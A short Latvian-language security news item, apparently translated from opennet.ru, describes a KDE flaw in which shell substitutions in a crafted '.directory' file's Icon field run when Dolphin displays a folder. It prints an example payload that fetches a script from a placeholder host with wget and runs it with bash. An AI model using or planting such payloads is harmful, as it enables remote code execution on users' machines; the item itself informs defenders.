KDE , kas ļauj uzbrucējam izpildīt patvaļīgas komandas, kad lietotājs skata direktoriju vai arhīvu, kurā ir īpaši izstrādāti “.desktop” un “.directory” faili. Uzbrukumam ir nepieciešams, lai lietotājs vienkārši skatītu failu sarakstu Dolphin failu pārvaldniekā, lejupielādētu ļaunprātīgu darbvirsmas failu vai velciet saīsni uz darbvirsmas vai dokumentā. Problēma izpaužas pašreizējā bibliotēku izlaidumā un vecākas versijas, līdz pat KDE 4. Ievainojamība joprojām pastāv (CVE nav piešķirts).
Problēmu izraisa nepareiza KDesktopFile klases ieviešana, kas, apstrādājot mainīgo “Icon”, bez atbilstošas atslēgšanās, nodod vērtību funkcijai KConfigPrivate::expandString(), kas veic čaulas speciālo rakstzīmju paplašināšanu, ieskaitot apstrādi. virknes “$(..)” kā izpildāmās komandas. Pretēji XDG specifikācijas prasībām, ieviešana čaulas konstrukcijas tiek ražotas, neatdalot iestatījumu veidu, t.i. ne tikai nosakot palaižamās lietojumprogrammas komandrindu, bet arī norādot ikonas, kas tiek rādītas pēc noklusējuma.
Piemēram, lai uzbruktu nosūtīt lietotājam zip arhīvu ar direktoriju, kurā ir fails “.directory”, piemēram:
[Darbvirsmas ieraksts] Tips = Katalogs
Ikona[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Mēģinot skatīt arhīva saturu Dolphin failu pārvaldniekā, tiks lejupielādēts un izpildīts skripts https://example.com/FILENAME.sh.
Avots: opennet.ru